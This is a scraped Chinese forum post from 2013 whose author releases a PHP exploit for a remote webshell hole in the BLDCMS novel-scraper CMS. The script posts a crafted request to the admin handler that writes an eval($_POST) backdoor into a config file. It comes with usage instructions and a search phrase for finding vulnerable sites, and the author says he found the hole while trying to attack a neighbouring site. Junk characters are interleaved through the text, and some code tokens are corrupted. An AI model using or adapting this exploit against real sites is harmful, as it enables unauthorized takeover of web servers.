之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞
' R7 H _- _; B% j% D, E3 F
" F9 q5 Z% B) S4 N
. T2 {" \; L; a. y话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了 5 t, {) V a; \. I3 C
1 l' g8 K0 _6 J既然都有人发了 我就把我之前写好的EXP放出来吧
4 H! e2 U" U. V
! ~ C4 ]. G, Jview source print?01.php;">$ |) a% m. ?- |2 m0 A( C% H; \* \- a
02.<!--?php
" w0 Q0 F. q& q: [' [03.echo "-------------------------------------------------------------------
; T* V) R/ ~* _5 c3 R$ @/ Q/ t04. * I6 [- {0 [( c7 W. r: I; [' Y
05.------------\r\n BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP" F9 m* C' D/ K5 m! h' H) H9 K0 U2 a
06.
; V* b0 _' t9 m6 g07.(GPC=Off)\r\n Vulnerability discovery&Code by 数据流@wooyun
6 s% u+ r6 v% d5 }9 d08.
) o& K0 E& A& s, V4 K2 C09.QQ:981009941\r\n 2013.3.21\r\n 5 A! o- r q9 o* N/ ]
10.
; |. S& @! R x. u$ t- m) @2 B4 w11. 2 ^1 S+ J6 j8 R# ~; V% o
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码5 F8 I$ j5 m4 N5 a0 n7 ~2 \% [0 X
13.
1 O( O& J4 A* |# O14.)\r\n 搜索关键字:\"开发者: 白老大小说\"\r\n-----------
; V% m1 r6 ~; s6 p4 Q15.
- M: a5 f% d" q# r16.--------------------------------------------------------------------\r\n";4 G: o5 N' `" V7 w7 R3 W6 A R
17.$url=$argv[1];
+ _/ q% P1 a `9 H; B/ ?9 E% [. t18.$dir=$argv[2];+ @0 L6 y( `8 r9 a
19.$pass=$argv[3];' F7 Z4 e. i" X# U% C
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';( E X5 T+ X# W( M
21.if (emptyempty($pass)||emptyempty($url))
" _/ y8 A% x. t' T22.{exit("请输入参数");}
7 ~; o! _1 P% A+ k* g8 ~. l. p23.else
# @, q7 r7 ^/ ~: f8 Z, {1 U# K1 g8 w/ p24.{
2 t3 f6 M1 j' k3 O6 P8 x; |1 p25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
9 y9 H2 V/ Y% }- o0 T+ t/ n, x26. 0 C E. o4 S& y6 ~
27.al;) ]+ |& N, t- p, |/ S7 u: A) f& @
28.$length = strlen($fuckdata);
8 O: b# W1 a3 O/ I1 n6 K5 s+ n29.function getshell($url,$pass)
- Y+ S- ^* y7 w# w. x2 \! ~30.{
' @& k5 T9 b( X6 s$ O; i31.global $url,$dir,$pass,$eval,$length,$fuckdata;0 K* L1 P( Z9 d# I; p% V
32.$header = " OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";6 y1 _; S! [6 w* z' ^
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";* n4 A$ v. t: y3 H6 U1 z9 q
34.$header .= "User-Agent: MSIE\r\n";% A+ W/ d3 ~. N# d
35.$header .= "Host:".$url."\r\n";
3 p3 n% D( m$ i8 q36.$header .= "Content-Length: ".$length."\r\n";4 R2 U3 G! P$ ^$ p( P
37.$header .= "Connection: Close\r\n";$ _* ?" g( |- P5 d- y9 Y; U4 w, }
38.$header .="\r\n";! h: G8 i& ?. M4 x
39.$header .= $fuckdata."\r\n\r\n";
- n& T+ R% V6 ]( r40.$fp = fsockopen($url, 80,$errno,$errstr,15);
1 V% Z4 C# N O* Y, {2 k! i41.if (!$fp)
& {3 q% ^+ y2 q! a B* y* w42.{" U" R' V8 u" ]- b' s# ~0 }2 O
43.exit ("利用失败:请检查指定目标是否能正常打开");
4 D* b9 X! r$ F* ^& V; V7 ~44.}
0 T9 H: I5 Q8 C4 T- F. g& w/ ~9 N }# V45.else{ if (!fputs($fp,$header))
5 ~6 K3 B0 Z' [46.{exit ("利用失败");}
4 @# g' |& r+ R2 `% y% v" t3 W6 B: v2 ?47.else1 A1 u0 }5 i: Z0 H. [" M
48.{4 L1 e- X7 v. u( m! x9 n. b
49.$receive = '';
: U5 O g9 t2 Z2 `9 u) O8 c* L6 ]! ^50.while (!feof($fp)) {9 \' O3 ~" l X$ S9 c. D
51.$receive .= @fgets($fp, 1000);. T6 @9 e* h$ ~8 w
52.}7 R4 d7 Z( j3 R: y/ v& R6 P
53.@fclose($fp);
i* ~0 T8 X' q* h" _/ A; g54.echo "$url/$dir/conn/config/normal2.php pass pass(如连接失败 请检查目标4 W1 |/ h' D, S9 r: I5 @5 y
55.
/ m. N3 b; \ T. M56.GPC是否=off)";
, M* w1 n7 G( q57.}}& i/ }! v `# Y" `, Z- r8 V1 R
58.}7 Z" ^* C! ?, v' D! O4 _
59.}' Q3 v+ A" C, m2 V, M# |4 ~
60.getshell($url,$pass);/ q& ^3 O0 I# X4 t8 ?7 Y
61.?-->
' a7 A( M# ^) F Y' R
' z: H$ @4 u* t3 }" ]5 M$ G! ?
: E1 ]! N0 j2 S) b* x5 }# n1 G6 ] . T, j M6 F5 T' z, G* o( ?( f
by 数据流
4 s% L$ z- \9 y7 E& ~0 g |
发表于 2013-3-26 20:49:10
收藏
支持
反对